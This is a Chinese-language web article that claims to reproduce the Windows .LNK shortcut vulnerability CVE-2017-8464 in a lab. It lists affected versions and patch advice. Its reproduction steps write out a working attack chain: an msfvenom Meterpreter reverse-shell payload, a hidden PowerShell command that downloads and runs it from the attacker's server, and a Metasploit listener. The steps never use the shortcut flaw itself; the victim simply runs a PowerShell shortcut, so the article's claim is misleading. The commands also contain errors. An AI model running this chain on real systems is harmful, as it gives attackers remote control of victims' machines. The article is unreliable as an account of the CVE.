如何实现远程命令执行漏洞CVE-2017-8464复现

发布时间:2021-12-28 20:02:28 作者:柒染
来源:亿速云 阅读:102

这期内容当中小编将会给大家带来有关如何实现远程命令执行漏洞CVE-2017-8464复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x00漏洞概述

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。注:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危

0x01影响范围

Microsoft Windows 10 Version 1607 for 32-bit Systems

Microsoft Windows 10 Version 1607 for x64-based Systems

Microsoft Windows 10 for 32-bit Systems

Microsoft Windows 10 for x64-based Systems

Microsoft Windows 10 version 1511 for 32-bit Systems

Microsoft Windows 10 version 1511 for x64-based Systems

Microsoft Windows 10 version 1703 for 32-bit Systems

Microsoft Windows 10 version 1703 for x64-based Systems

Microsoft Windows 7 for 32-bit Systems SP1

Microsoft Windows 7 for x64-based Systems SP1

Microsoft Windows 8.1 for 32-bit Systems

Microsoft Windows 8.1 for x64-based Systems

Microsoft Windows RT 8.1

Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

Microsoft Windows Server 2008 R2 for x64-based Systems SP1

Microsoft Windows Server 2008 for 32-bit Systems SP2

Microsoft Windows Server 2008 for Itanium-based Systems SP2

Microsoft Windows Server 2008 for x64-based Systems SP2

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

0x02环境搭建

受害机:windows2008R2

攻击机:kali

1. 在msdn下载存在漏洞版本系统镜像,使用VMware虚拟机安装镜像

Madn下载地址:https://msdn.itellyou.cn/

如何实现远程命令执行漏洞CVE-2017-8464复现

2.下载完成后使用VMware安装虚拟机。注:安装方法最新百度

如何实现远程命令执行漏洞CVE-2017-8464复现

0x03漏洞复现

1.打开kali,使用kali下的msfvenom生成一个ps1的shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.6 lport=9999 -f psh-reflection>/root/test/shell.ps1

如何实现远程命令执行漏洞CVE-2017-8464复现

2.将生成的shell.ps1复制到/var/www/html目录下,然后开启apache服务,在浏览器访问shell.ps1文件可直接访问

cp shell.ps1 /var/www/htnl

service apache2 start

如何实现远程命令执行漏洞CVE-2017-8464复现

如何实现远程命令执行漏洞CVE-2017-8464复现

3.在受害机上在在桌面右键创建一个powersehll远程快捷方式,命令为powershell.exe

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.6/shell.ps1');test.ps1"

如何实现远程命令执行漏洞CVE-2017-8464复现

如何实现远程命令执行漏洞CVE-2017-8464复现

如何实现远程命令执行漏洞CVE-2017-8464复现

4.在kali使用msf配置监听模块,并运行

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

show options

set LHOST xxx.xxx.xx.x

set lport 9999

run

如何实现远程命令执行漏洞CVE-2017-8464复现

5.配置完成并运行了之后,在受害机运行刚刚创建的powershell文件,可以看到kali反弹了shell

如何实现远程命令执行漏洞CVE-2017-8464复现

0x04修复建议

1.建议安装官方补丁

2.安装防护软件

上述就是小编为大家分享的如何实现远程命令执行漏洞CVE-2017-8464复现了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. ThinkPHP远程命令执行漏洞原理及复现
  2. 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

上一篇:ActiveMQ反序列化任意命令执行漏洞的实例分析

下一篇:如何进行FireEye中的CVE-2019-11580漏洞分析

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》